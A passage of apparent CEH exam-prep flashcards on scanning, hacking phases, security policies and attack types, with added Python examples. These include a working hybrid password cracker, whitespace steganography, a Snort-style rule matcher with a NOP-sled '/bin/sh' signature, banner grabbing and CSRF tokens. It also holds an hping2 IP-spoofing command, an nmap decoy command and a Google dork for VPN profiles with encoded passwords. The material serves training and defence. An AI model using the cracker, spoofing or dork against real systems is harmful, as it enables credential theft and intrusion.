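# Mutation rules applied to every dictionary word (assumed, typical of hybrid attacks).
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ("", "1", "123", "!", "2024", "!1")
PREFIXES = ("",)


def case_variants(word):
    return {word.lower(), word.capitalize(), word.upper()}


def hybrid_candidates(words, prefixes=PREFIXES, suffixes=SUFFIXES):
    """Dictionary words plus case, leetspeak and affix variations, deduplicated,
    yielded lazily so a large wordlist is not materialised."""
    seen = set()
    for word in words:
        bases = set()
        for variant in case_variants(word):
            bases.add(variant)
            bases.add(variant.translate(LEET))
        for base, pre, suf in itertools.product(sorted(bases), prefixes, suffixes):
            candidate = f"{pre}{base}{suf}"
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def hybrid_attack(target_hash, words, hash_fn=sha256_hex):
    """Return the candidate whose hash equals target_hash, or None if the
    dictionary-plus-mutations space does not contain it."""
    for candidate in hybrid_candidates(words):
        if hash_fn(candidate) == target_hash:
            return candidate
    return None


# Constructed targets: unsalted SHA-256 of two passwords a hybrid attack reaches
# ("Summer2024", "P455w0rd!") and one it does not ("xq9#Lm").
TARGETS = {name: sha256_hex(name) for name in ("Summer2024", "P455w0rd!", "xq9#Lm")}
WORDS = ["password", "summer", "welcome"]

if __name__ == "__main__":
    for name, digest in TARGETS.items():
        print(f"{digest[:12]}... -> {hybrid_attack(digest, WORDS)}")
```

The third target is the point of the card's other answer options: a random string is out of reach of any dictionary-derived list and only a brute-force attack (every combination) would find it.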

B)Hides message with whitespace

How does the tool SNOW facilitate the use of steganography? A)Hides files with folders B)Hides message with whitespace C)Hides messages in graphics D)Hides messages in carrier files
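
A minimal SNOW-style whitespace channel, added here as an example (not SNOW's code): each bit of the secret becomes a trailing space (0) or tab (1) on a line of the cover text, so the visible text is unchanged. The layout (8 bits per line, a 2-byte length prefix, extra blank lines when the cover is too short) and the cover text and secret are my own choices.

```python
BITS_PER_LINE = 8


def _to_bits(data):
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def _from_bits(bits):
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, len(bits) - len(bits) % 8, 8))


def hide(cover, secret, bits_per_line=BITS_PER_LINE):
    """Append whitespace-encoded bits to the cover's lines; extra empty lines are
    added if the cover is shorter than the payload needs."""
    payload = len(secret).to_bytes(2, "big") + secret
    bits = list(_to_bits(payload))
    lines = [line.rstrip(" \t") for line in cover.rstrip("\n").split("\n")]
    out, pos = [], 0
    while pos < len(bits) or len(out) < len(lines):
        base = lines[len(out)] if len(out) < len(lines) else ""
        chunk = bits[pos:pos + bits_per_line]
        out.append(base + "".join("\t" if b else " " for b in chunk))
        pos += len(chunk)
    return "\n".join(out) + "\n"


def reveal(stego):
    """Read trailing spaces/tabs back into bits, then honour the length prefix."""
    bits = []
    for line in stego.split("\n"):
        trailing = line[len(line.rstrip(" \t")):]
        bits.extend(1 if ch == "\t" else 0 for ch in trailing)
    data = _from_bits(bits)
    length = int.from_bytes(data[:2], "big")
    return data[2:2 + length]


def visible(text):
    """What a reader (or diff) sees: every line with its trailing whitespace removed."""
    return "\n".join(line.rstrip(" \t") for line in text.rstrip("\n").split("\n")) + "\n"


# Constructed cover text and secret.
COVER = "Meeting moved to 10am.\nBring the Q3 numbers.\n"
SECRET = b"rdv 21:00 pier 4"

if __name__ == "__main__":
    stego = hide(COVER, SECRET)
    print(repr(stego))
    print(reveal(stego))
```

The weakness is as obvious as the trick: trailing whitespace survives a copy-paste but not an editor configured to strip it, and a one-line check such as grep -n '[[:space:]]$' on outbound text flags every carrier line, which is why SNOW also compresses and encrypts the payload so that what is found is not immediately readable.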

16 bits long

How long is the field for port numbers?

Disable LLMNR Disable NBT-NS

How to defend against LLMNR/NBT-NS poisoning

1) To delete NTFS streams, move the suspected files to a FAT partition 2) Use a third-party file integrity checker such as Tripwire File Integrity Monitoring to maintain the integrity of NTFS partition files 3) Use programs such as Stream Detector, LADS, ADS Detector, etc. to detect streams 4) Enable real-time antivirus scanning to protect against execution of malicious streams on your system 5) Use up-to-date antivirus software on your system

How to Defend against NTFS Streams

1) Reinstall OS/applications from a trusted source after backing up the critical data 2) Keep well-documented automated installation procedures 3) Perform kernel memory dump analysis to determine the presence of rootkits 4) Harden the workstation or server against the attack 5) Educate staff not to download any files/programs from untrusted sources 6) Install network and host-based firewalls 7) Ensure the availability of trusted restoration media 8) Update and patch operating systems and applications 9) Verify the integrity of system files regularly using cryptographically strong digital fingerprint technologies 10) Update antivirus and anti-spyware software regularly 11) Avoid logging in with an account that has administrative privileges 12) Adhere to the least privilege principle 13) Ensure the chosen antivirus software possesses rootkit protection 14) Do not install unnecessary applications, and disable features and services not in use

How to defend against Rootkits

-Q --seqnum

Hping option used in order to collect sequence numbers generated by the target host

-2

Hping sets UDP mode

-9

Hping sets in listen mode, to trigger on a signature argument when it sees it come through.

-8

Hping sets scan mode, expecting an argument for the ports to be scanned (single, range 1-1000)

-A

Hping sets the ACK flag

-F

Hping sets the FIN flag

-P

Hping sets the PSH flag

-R

Hping sets the RST flag

-X

Hping sets the XMAS scan flags.

--flood

Hping will send packets as fast as possible, without taking care to show incoming replies.

Habits

Human beings tend to follow set patterns and behaviors known as ____.

Email Security Policy

It is created to govern the proper usage of corporate email

Direct TTL Probes IP Identification Number TCP Flow Control Method

IP Spoofing Detection Techniques

was Internet Assigned Numbers Authority (IANA) now Internet Corporation for Assigned Names and Numbers (ICANN)

IP address management is done through what?

Layer 3 Network

IP resides at what layer of the OSI model?

hping2 www.certifiedhacker.com -a 7.7.7.7

IP spoofing using Hping2

127.0.0.1

IPv4 loop back address

32 bits 128 bits

IPv6 increases the IP address size from __ to __, to support more levels of addressing hierarchy

UDP 500

ISAKMP/Internet Key Exchange (IKE)

NIDS and HIDS

If a ping sweep is not done properly or is done too fast, which systems can detect it?

inject a malicious dylib

If attackers can ___ in one of the primary directories, it will be executed in place of the original dylib

stateful firewall

If doing an ACK flag probe and there is no response, this indicates a ____ is between the attacker and the host.

higher

If the primary's serial number (SN) is ___ than the secondary's, it is time to update.

port is open

If the TTL value of the RST packet on a particular port is less than the boundary value of 64, then that ___

Port is closed

If the TTL value of the RST packet on a particular port is more than the boundary value of 64, then that ___

is open

If the WINDOW value of the RST packet on a particular port is non-zero, then that port ___

replace the target binary

If the file system permissions of binaries are not properly set, an attacker can ___ with a malicious file

replace redundant bits of image

Image steganography tools ___ data with the message in such a way that the effect cannot be detected by human eyes

D)Encrypting the data exchanged

In a hybrid PKI model, which function is performed by the symmetric algorithm? A)Encrypting the symmetric key exchanged B)Authenticating the remote device C)Exchanging the keys D)Encrypting the data exchanged

Logical safeguards

In a risk assessment, event logging and password management are examples of which type of safeguard?

Physical safeguards

In a risk assessment, facility access control and equipment inventory are examples of which type of safeguard?

B. Visit www.archive.org and see whether the old copy is available

In gathering information about a potential target, you carry out social engineering attacks against employees. While eavesdropping, you overhear an employee conversation about a sensitive document that was inadvertently posted to the company website and remained on the site for a few days but was later removed. In checking the website, you find the document has indeed been removed. What is a possible solution for finding the document? A. Install Black Widow and copy the website to your machine; the page may simply be hidden B. Visit www.archive.org and see whether the old copy is available C. Attempt a SQL injection attack against the site D. None of the above. It is impossible to recover

B. The attacker is attempting a password crack D. The attacker is attempting to launch a command line shell

In the output of a network IDS capture you notice a large number of 0x90 values, with "/bin/sh" also appearing in the ASCII part of the output. Which of the following are the most accurate assumptions based on these observations? (Choose Two) A. The attacker is attempting a buffer overflow B. The attacker is attempting a password crack C. The attacker is attempting a session hijack D. The attacker is attempting to launch a command line shell
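
Both of the last two detection cards, the "Examine the following Snort rule" card and this NOP-sled observation, exercised by a small rule matcher. This is an added example, not Snort's code and not from the page: it handles the header fields the first card's answer options turn on (the negated !$HOME_NET source, the any source port, the fixed destination port 23) plus content: options, including Snort's |hex| byte syntax so that the 0x90 run can be matched. The $HOME_NET value, the second rule and the four packets are my own constructions.

```python
import ipaddress
import re

# Assumed value for $HOME_NET; the card does not give one.
VARIABLES = {"$HOME_NET": ipaddress.ip_network("10.0.0.0/8")}

# The first rule is the one on the card. The second is an added rule for the
# NOP-sled observation; Snort writes raw bytes between '|' characters in content strings.
RULES = [
    'alert tcp !$HOME_NET any -> $HOME_NET 23 (content:"admin"; msg:"Telnet attempt..admin access";)',
    'alert tcp any any -> $HOME_NET any (content:"|90 90 90 90 90 90 90 90|"; content:"/bin/sh"; msg:"NOP sled followed by /bin/sh";)',
]

RULE_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s+\((?P<opts>.*)\)\s*$"
)


def content_bytes(spec):
    """'abc|90 90|def' -> b'abc\\x90\\x90def'."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        out.extend(bytes.fromhex(part) if i % 2 else part.encode("latin-1"))
    return bytes(out)


def _addr(spec, variables):
    negated = spec.startswith("!")
    spec = spec.lstrip("!")
    if spec == "any":
        net = None
    elif spec.startswith("$"):
        net = variables[spec]
    else:
        net = ipaddress.ip_network(spec, strict=False)
    return negated, net


def _port(spec):
    return None if spec == "any" else int(spec)


def parse_rule(text, variables=VARIABLES):
    m = RULE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparsable rule: {text}")
    rule = {"action": m["action"], "proto": m["proto"].lower(),
            "src": _addr(m["src"], variables), "sport": _port(m["sport"]),
            "dst": _addr(m["dst"], variables), "dport": _port(m["dport"]),
            "content": [], "msg": ""}
    for item in m["opts"].split(";"):
        key, _, val = item.strip().partition(":")
        key, val = key.strip(), val.strip().strip('"')
        if key == "content":
            rule["content"].append(content_bytes(val))
        elif key == "msg":
            rule["msg"] = val
    return rule


def _addr_matches(addr_spec, ip):
    negated, net = addr_spec
    hit = net is None or ipaddress.ip_address(ip) in net
    return not hit if negated else hit


def matches(rule, pkt):
    """Header test first (proto, negatable src/dst nets, ports), then every content:
    option must appear somewhere in the payload."""
    if rule["proto"] != "ip" and pkt["proto"] != rule["proto"]:
        return False
    if not _addr_matches(rule["src"], pkt["src"]) or not _addr_matches(rule["dst"], pkt["dst"]):
        return False
    if rule["sport"] not in (None, pkt["sport"]) or rule["dport"] not in (None, pkt["dport"]):
        return False
    return all(c in pkt["payload"] for c in rule["content"])


def run(rules, packets):
    return [{"msg": r["msg"], "src": p["src"], "sport": p["sport"], "dst": p["dst"], "dport": p["dport"]}
            for p in packets for r in rules if matches(r, p)]


def pkt(src, sport, dst, dport, payload, proto="tcp"):
    return {"proto": proto, "src": src, "sport": sport, "dst": dst, "dport": dport, "payload": payload}


# Constructed traffic, one packet per case the card's answer options describe.
PACKETS = [
    pkt("203.0.113.7", 51234, "10.1.1.5", 23, b"login: admin\r\n"),            # outside -> home:23, fires
    pkt("10.1.1.9", 40000, "10.1.1.5", 23, b"login: admin\r\n"),               # inside -> home:23, !$HOME_NET excludes it
    pkt("203.0.113.7", 23, "10.1.1.5", 4444, b"admin"),                       # source port 23 is not what the rule keys on
    pkt("203.0.113.9", 5555, "10.1.1.5", 80, b"\x90" * 64 + b"/bin/sh\x00"),  # NOP sled plus shell string
]

if __name__ == "__main__":
    for alert in run([parse_rule(r) for r in RULES], PACKETS):
        print(alert)
```

Packets 2 and 3 are the cases behind the false options A and C: the second is dropped by the negated source network, the third by the destination-port test. The fourth packet is the shape the IDS capture card describes, and the added rule fires on it only because both content: options are present, which keeps a lone "/bin/sh" in an ordinary shell transcript from raising the alert.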

XML denial of service

In what type of attack does the attacker craft an XML message with very large payloads, recursive content, excessive nesting, malicious external entities, or malicious DTDs (Document Type Definitions)?

Cover tracks

In which CEH system hacking stage do you clear the security log?

Escalate privileges

In which CEH system hacking stage do you dump the SAM file?

Executing applications

In which CEH system hacking stage do you execute the payload?

Cracking passwords

In which CEH system hacking stage do you use Brutus?

D. Parameter Manipulation

In which attack would a hacker modify the URL in the web browser's address field to attempt to gain access to resources they're not supposed to be able to view? A. SQL injection B. XSS C. Brute Force D. Parameter Manipulation

Conclusion

In which phase of a penetration test (preparation, conduct, conclusion) do you advise corrective action?

Preparation

In which phase of a penetration test (preparation, conduct, conclusion) do you execute a formal contract that guarantees non-disclosure of the client's data and legal protection for the tester?

Conduct

In which phase of a penetration test (preparation, conduct, conclusion) does the tester look for potential vulnerabilities?

Maintaining Access

In which phase of an attack are rootkits installed and unpatched systems taken advantage of?

Gaining Access

In which phase of an attack are the systems breached, malicious code planted, and backdoors opened?

B. Scanning and enumeration

In which phase of the ethical hacking methodology would a hacker be expected to discover available targets on a network? A. Reconnaissance B. Scanning and enumeration C. Gaining access D. Maintaining access E. Covering tracks

B. Scanning and enumeration

In which stage of an ethical hack would the attacker actively apply tools and techniques to gather more in-depth information on the targets? A. Active reconnaissance B. Scanning and enumeration C. Gaining access D. Passive reconnaissance

Construction stage

In which stage of the Secure Assurance Maturity Model lifecycle are components and libraries built?

Design phase

In which stage of the Secure Software Development Lifecycle is the platform and programming language chosen?

E)Cracking passwords

In which step of the CEH Hacking Methodology (CHM) do you recover the credentials for a system account? A)Covering tracks B)Hiding files C)Executing applications D)Penetration testing E)Cracking passwords F)Escalating privileges

TechSpy EmpSpy

InSpy has two functionalities: __: Crawls LinkedIn job listings for technologies used by the target company __: Crawls LinkedIn for employees working at the provided company

White Hats

Individuals professing hacker skills and using them for defensive purposes and are also known as security analysts

Suicide Hackers

Individuals who aim to bring down critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment

Hacktivist

Individuals who promote a political agenda by hacking, especially by defacing or disabling websites

Gray Hats

Individuals who work both offensively and defensively at various times

Black Hats

Individuals with extraordinary computing skills, resorting to malicious or destructive activities and are also known as crackers

GiliSoft File Lock Pro

It locks files, folders, and drives; hides files, folders, and drives to make them invisible; or password-protects files, folders, and drives

(Inverse TCP flag) No response RST/ACK

Inverse TCP flag, if the port is open there will be ____, if the port is closed, a ____ will be sent in response.

Evaluation Assurance Level (EAL)

Under the Common Criteria, it provides a way for vendors to make claims about their in-place security by following a set standard of controls and testing methods. Levels 1-7

Password Policy

It provides guidelines for using strong password protection on organization's resources

Botnet

Is a huge network of the compromised systems used by an intruder to perform various network attacks

Defense in Depth

Is a security strategy in which several protection layers are placed throughout an information system

Incident Management

Is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore normal service operations as quickly as possible and prevent future recurrence of the incident

Enterprise Information Security Architecture (EISA)

Is a set of requirements, processes, principles, and models that determines the structure and behavior of an organization's information systems

Competitive Intelligence Gathering

Is the process of identifying, gathering, analyzing, verifying, and using information about your competitors from resources such as the Internet

Identify Vulnerabilities

It allows attackers to identify vulnerabilities in the target systems in order to select appropriate exploits

Draw Network Map

It allows attackers to draw a map or outline the target organization's network infrastructure to know about the actual environment that they are going to break

decoys as well as the host(s)

It appears to the target that the ___ are scanning the network when using the IP address decoy technique

Firewall-Management Policy

It defines access, management, and monitoring of firewalls in the organization

Acceptable-Use Policy

It defines the acceptable use of system resources

User-Account Policy

It defines the account creation process, and authority, rights and responsibilities of user accounts

Access Control Policy

It defines the resources being protected and the rules that control access to them

Information-Protection Policy

It defines the sensitivity levels of information, who may have access, how it is stored and transmitted, and how it should be deleted from storage media

Remote-Access Policy

It defines who can have remote access, and defines access medium and remote access security controls

Network-Connection Policy

It defines who can install new resources on the network, approve the installation of new devices, document network changes, etc.

Paranoid Policy

It forbids everything, no internet connection, or severely limited internet usage

Daisy Chaining

It involves gaining access to one network and/or computer and then using the same information to gain access to multiple networks and computers that contain desirable information

Physical Security

It involves protection of organizational assets from environmental and man made threats

Insider Attack

It is an attack performed on a corporate network or on a single computer by a trusted person who has authorized access to the network

Log what has occurred, consult the security policy, and act accordingly

Jim is working all night as the security administrator. He makes note of some unusual network activity at about 3 AM. Based on the unusual activity, Jim suspects an attack is underway, but he has no other evidence. How should Jim react to the situation? A)Log what has occurred and immediately call the incident response team B)Log what has occurred, consult the security policy, and act accordingly C)Log what has occurred and continue normal administrative duties D)Log what has occurred and wait for further evidence of an attack

A. DNS poisoning

Joe accesses the company website, www.anybusi.com, from his home computer and is presented with a defaced site containing disturbing images. He calls the IT department to report the website hack and is told they do not see any problem with the site--no files have been changed, and when accessed from their terminals (inside the company), the site appears normally. Joe connects over VPN into the company website and notices the site appears normally. Which of the following might explain the issue? A. DNS poisoning B. Route poisoning C. SQL injection D. ARP poisoning

B. Suicide hacker

Joe is a security engineer for a firm. His company downsizes, and Joe discovers he will be laid off within a short amount of time. Joe plants viruses and sets about destroying data and settings throughout the network, with no regard to being caught. Which type of hacker is Joe considered to be? A. Hactivist B. Suicide hacker C. Black hat D. Script kiddie

C)Insider affiliate

Joe, who does not work for your company, was able to steal an employee badge from a car in the parking lot and use it to enter the facility. What type of threat does Joe present? A)Pure insider B)Insider associate C)Insider affiliate D)Outside affiliate

name resolution

LLMNR and NBT-NS are two main elements of Windows operating systems used to perform ___ for hosts present on the same link

Responder Metasploit NBNSpoof Inveigh

LLMNR/NBT-NS Spoofing Tools

Presentation

Layer 6 of OSI model

Banner grabbing from page extensions

Looking for an extension in the URL may assist in determining the application version Example: .aspx => IIS server and Windows platform

C. The username and password fields stored in the table named users will be displayed

Log files from an attack reveal the following entry SELECT username, password FROM users; Which of the following best describes the result of this command query? A. The username and password fields will be deleted from a table named users B. A username field and a password field will be added to a table named users C. The username and password fields stored in the table named users will be displayed D. The command will not produce any results

!Host=*.* intext:enc_UserPassword=* ext:pcf

Google search string to look for .pcf files, which contain Cisco VPN client user profiles (including the encoded group password)

allowing remote access

Necurs contains backdoor functionality, ___ and control of the infected computer

C)Public-key encryption and digital signatures

Management decides to implement a public key infrastructure (PKI) on the network. Which services will it provide? A)Private-key encryption and digital signatures B)Hashing and digital signatures C)Public-key encryption and digital signatures D)Public-key encryption and hashing

contingency plan

Management policy and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of an emergency, system failure, or disaster.

nmap -D decoy1,decoy2,decoy3,... target

Manually specify the IP addresses of the decoys using Nmap (comma-separated, no spaces; use ME in the list to control where your real address appears)

Health Insurance Portability and Accountability Act (HIPAA)

Many medical facilities need to maintain compliance with the ___.

Google Earth Google Maps Bing Maps

Mapping and location-specific information, including drive-by pictures of the company exterior and overhead shots can be found where?

Spytech SpyAgent Power Spy

Name a couple of Spyware

Horse Pill GrayFish Sirefef Necurs

Name four Rootkits

logical or physical path

Network diagram shows ____ to a potential target

D. A parallel, fast ACK scan of a Class C subnet

Nmap is a powerful scanning and enumeration tool. What does the following nmap command attempt to accomplish? nmap -sA -T4 192.168.15.0/24 A. A serial, slow operating system discovery scan of a Class C subnet B. A parallel, fast operating system discovery scan of a Class C subnet C. A serial, slow ACK scan of a Class C subnet D. A parallel, fast ACK scan of a Class C subnet

-To discover live hosts, IP address, and open ports of live hosts - To discover operating systems and system architecture - To discover services running on hosts - To discover vulnerabilities in live hosts

Objectives of Network Scanning

Access creep

Occurs when authorized users accumulate excess privileges on a system because of moving from one position to another; allowances accidentally remain with the account from position to position.

rwho

On a Unix/Linux Displays a list of users who are logged in to hosts on the local network

rusers

On a Unix/Linux Displays a list of users who are logged on to remote machines or machines on local network

finger

On a Unix/Linux Displays information about system users such as user's login name, real name, terminal name, idle time, login time, office location and office phone numbers

arp -a

On a Windows machine what is the command to display your current ARP cache?

Collision domain

On a switch, each switchport represents a ____.

A)Something you have

On your advice, your company will implement a new access control mechanism for the data center. Users must provide the following evidence for authentication: Username/password credentials Smart card swipe Fingerprint scan Once in the data center, the terminal from which they access is logged and verified against a list of allowable machines. You need to justify the additional expense for the multi-factor authentication process to management. Which authentication factor does the smart card satisfy? A)Something you have B)Somewhere you are C)Something you are D)Something you know

nbtstat

On your own machine if you want to bring up a host of switches to use for information-gathering purposes using NetBIOS.

A)Current operating system

One of your ethical hackers logs into several computers using Telnet and grabs the banner on these computers. What information is the ethical hacker able to discover? A)Current operating system B)Running applications C)Currently logged-in user D)Open ports

B. Passive OS fingerprinting

One of your team members is analyzing TTL fields and TCP window sizes in order to fingerprint the OS of a target. Which of the following is most likely being attempted? A. Online OS fingerprinting B. Passive OS fingerprinting C. Aggressive OS fingerprinting D. Active OS fingerprinting

maintain persistence escalate privileges

Path interception helps an attacker to ___ on a system and ___

NS

Points to host's name server

Permissive Policy

Policy begins wide open and only known dangerous services/attacks or behaviors are blocked. It should be updated regularly to be effective

POP3 (TCP)

Port number 110

SSH (TCP)

Port number 22

Telnet (TCP)

Port number 23

LDAP (TCP, UDP)

Port number 389

Port is open (Inverse TCP Flag Scanning)

Probe Packet (FIN/URG/PSH/NULL) --> <-- No Response

C)Impersonation

Recently, your organization was the victim of a social engineering attack. Security guards allowed a power company repairman into the company to supposedly perform some tests. The repairman actually installed a network sniffer on the network. Which type of social engineering attack occurred? A)Dumpster diving B)Piggybacking C)Impersonation D)Eavesdropping

A)Detective

Requiring an audit trail in the security policy is an example of implementing which type of control? A)Detective B)Compensatory C)Preventative D)Corrective

[inurl:]

Restricts the results to documents containing the search keyword in the URL

[allintitle:]

Restricts the results to those websites with all of the search keywords in the title

Serial number

Revision number of the zone file. This number increments each time the zone file changes and is used by a secondary server to know when to update its copy.

A SID with a RID of 500 for an administrator

S-1-5-21-3874928736-367528774-1298337465-500

C) SNMPv3

SNMP provides great network management resource potential but also produces some significant security vulnerabilities. Which SNMP version provides encryption and authentication measures? A) SNMPv1 B) SNMPv2 C) SNMPv3 D) B and C E) None of the above

is the process of discovering systems on the network and taking a look at what open ports and applications may be running

Scanning

Credit card details and social security number User names and passwords Security products in use Operating systems and software versions Network layout information IP addresses and names of servers

Social engineers attempt to gather:

personal and organizational information

Social networking sites are the great source of ______

F) UDP 514

Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use to you. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 110 C) TCP 161 D) UDP 161 E) TCP 514 F) UDP 514

port 23

Telnet runs on _____.

wireless wired

The AP is connected to both the ___ LAN and the ___ LAN, providing wireless clients access to network resources.

TTL

In traceroute, the ___ value of each successive probe packet is incremented by one after the previous hop is hit and returns a Time Exceeded message (routers decrement the field by one at each hop).

assessment or security evaluation

The ___ phase, the actual assaults on the security controls are conducted during this time.

D. Attempt banner grabbing.

The following results are from an nmap scan: Starting nmap V. 3.10A ( www.insecure.org/nmap/ <http://www.insecure.org/nmap/> ) Interesting ports on 192.168.15.12: (The 1592 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp closed domain 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed -- 1 IP address (1 host up) scanned in 263.46 seconds Which of the following is the best option to assist in identifying the operating system? A. Attempt an ACK scan. B. Traceroute to the system. C. Run the same nmap scan with the -vv options. D. Attempt banner grabbing.
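Banner grabbing is the cheapest next step when the OS guess is inconclusive: connect to an open port and read what the service volunteers. The block below is an added example, not code from the original page. To keep it runnable offline it spins up a throwaway listener on 127.0.0.1 that returns a constructed SMTP-style greeting (assumed, not from any real host), grabs the banner with an ordinary socket, and pulls product/OS hints out of it; against a real target you would point `grab_banner` at the host and port from the nmap output.

```python
"""Banner grabbing against a local stand-in service (added example)."""
import socket
import threading

# Constructed banner in the style of an SMTP greeting; not from a real host.
FAKE_BANNER = b"220 mail.example.test ESMTP Postfix (Ubuntu)\r\n"


def start_fake_service(banner: bytes = FAKE_BANNER) -> int:
    """Start a one-shot TCP listener on 127.0.0.1 that sends `banner`; return its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def grab_banner(host: str, port: int, timeout: float = 3.0, probe: bytes = b"") -> str:
    """Connect, optionally send a probe, and return the first line the service sends.

    SMTP/FTP/SSH talk first, so no probe is needed; HTTP is silent until asked, so pass
    e.g. probe=b"HEAD / HTTP/1.0\r\n\r\n" to read the Server: header.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        data = s.recv(1024)
    return data.decode(errors="replace").strip()


def parse_banner(banner: str) -> dict:
    """Pull product and OS hints out of a greeting line (simple substring heuristics)."""
    hints = {"product": None, "os_hint": None}
    for product in ("Postfix", "Sendmail", "Exim", "OpenSSH", "Microsoft-IIS", "Apache"):
        if product in banner:
            hints["product"] = product
    for os_name in ("Ubuntu", "Debian", "FreeBSD", "Windows"):
        if os_name in banner:
            hints["os_hint"] = os_name
    return hints


if __name__ == "__main__":
    port = start_fake_service()
    banner = grab_banner("127.0.0.1", port)
    print(banner, parse_banner(banner))
```

Banners are self-reported and easy to forge or strip (ServerTokens Prod, a rewritten SSH version string), so treat the result as a hint to be confirmed by behaviour, not as ground truth.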

"SYN/ACK" (Session request acknowledgment) "RST" (Reset)

The target machine will send back a ___ packet if the port is open, and an ___ packet if the port is closed

Integrity

The trustworthiness of data or resources in terms of preventing improper and unauthorized changes

C)CSRF

The use of random tokens by a web application could help prevent which type of attack? A)XSS B)SQL injection C)CSRF D)SYN flood
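To make the CSRF answer concrete, here is an added example (not part of the original page, and framework-agnostic) of the token scheme the question alludes to: each token is a fresh random nonce bound to the user's session with an HMAC, so a forged cross-site request, which cannot read the victim's page, cannot supply a valid token. The server secret, the session IDs and the toy `handle_transfer` handler are assumptions made up for the example.

```python
"""Per-session anti-CSRF tokens with HMAC binding (added example)."""
import hashlib
import hmac
import secrets
from typing import Optional

# Server-side secret; in practice load it from config or a KMS. Constructed here.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce || HMAC(secret, session_id:nonce). Embed it in the form as a hidden field."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: Optional[str]) -> bool:
    """Constant-time check that `token` was issued for this session."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(request: dict) -> str:
    """Toy state-changing handler; `request` carries the session ID and POSTed form fields."""
    session_id = request["session_id"]
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: transferred {request['form']['amount']} to {request['form']['to']}"


if __name__ == "__main__":
    tok = issue_csrf_token("sess-A")
    good = {"session_id": "sess-A", "form": {"amount": "10", "to": "bob", "csrf_token": tok}}
    forged = {"session_id": "sess-A", "form": {"amount": "10", "to": "bob"}}
    print(handle_transfer(good))
    print(handle_transfer(forged))
```

Two points practitioners get wrong: the token must be tied to the session (a token valid for any session is just a second cookie), and the comparison must be constant-time (`hmac.compare_digest`), not `==`. The token is an anti-CSRF control only; it does nothing against XSS, which can read the page and the token along with it.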

A)Type 3/Code 13

You are performing a ping sweep of a local subnet. Which reply message would you receive if routers are blocking ICMP? A)Type 3/Code 13 B)Type 3/Code 6 C)Type 13 D)Type 0

A. &gt;

There are certain characters that cannot be used within text in HTML because these characters confuse the browser. In these instances, an HTML entity can be used to represent the character. Which HTML entity corresponds to the greater-than > character? A. &gt; B. &lt; C. ) D. (

Misconfiguration attacks

These attacks take advantage of systems that are, on purpose or by accident, not configured appropriately for security.

Information Audit Policy

This defines the framework for auditing security within the organization. When, where, how often, and sometimes even who conducts it are described here.

Information Security Policy

This identifies to employees what company systems may be used for, what they cannot be used for, and what the consequences are for breaking the rules. Generally employees are required to sign a copy before accessing resources. Versions of this policy are also known as an Acceptable Use Policy.

MX (Mail Exchange)

This record identifies your e-mail servers within your domain.

Inverse TCP flag (also called FIN scan or NULL scan)

This scan uses the FIN, URG, or PSH flag (or, in one version, no flags at all) to poke at system ports.
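The inverse TCP flag cards above (no response = open, RST/ACK = closed), the SYN scan card (SYN/ACK = open, RST = closed) and this one all come down to reading the flag bits of a raw TCP header and applying RFC 793 behaviour. The following added example (not from the original page) builds and parses 20-byte TCP headers, names the probe an IDS would see, and classifies the reply to a SYN or inverse-flag probe; the port numbers and the headers themselves are constructed test data, and the raw-socket send/receive is deliberately out of scope.

```python
"""Raw TCP header parsing and scan-response classification (added example)."""
import struct
from typing import Optional

FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
TCP_FMT = "!HHIIHHHH"  # src, dst, seq, ack, data-offset+flags, window, checksum, urgent ptr


def build_tcp_header(src_port, dst_port, flags, seq=0, ack=0, window=8192) -> bytes:
    """Construct a 20-byte options-free TCP header (checksum left zero; test data only)."""
    bits = 0
    for name in flags:
        bits |= FLAG_BITS[name]
    return struct.pack(TCP_FMT, src_port, dst_port, seq, ack, (5 << 12) | bits, window, 0, 0)


def parse_tcp_flags(header: bytes) -> set:
    """Return the names of the flags set in a raw TCP header."""
    off_flags = struct.unpack(TCP_FMT, header[:20])[4]
    return {name for name, bit in FLAG_BITS.items() if off_flags & bit}


def probe_type(flags: set) -> str:
    """Name the probe an IDS would log, from the flags on an unsolicited segment."""
    if flags == set():
        return "null"
    if flags == {"FIN"}:
        return "fin"
    if flags == {"FIN", "PSH", "URG"}:
        return "xmas"
    if flags == {"SYN"}:
        return "syn"
    return "other"


def classify_port(scan_type: str, response: Optional[bytes]) -> str:
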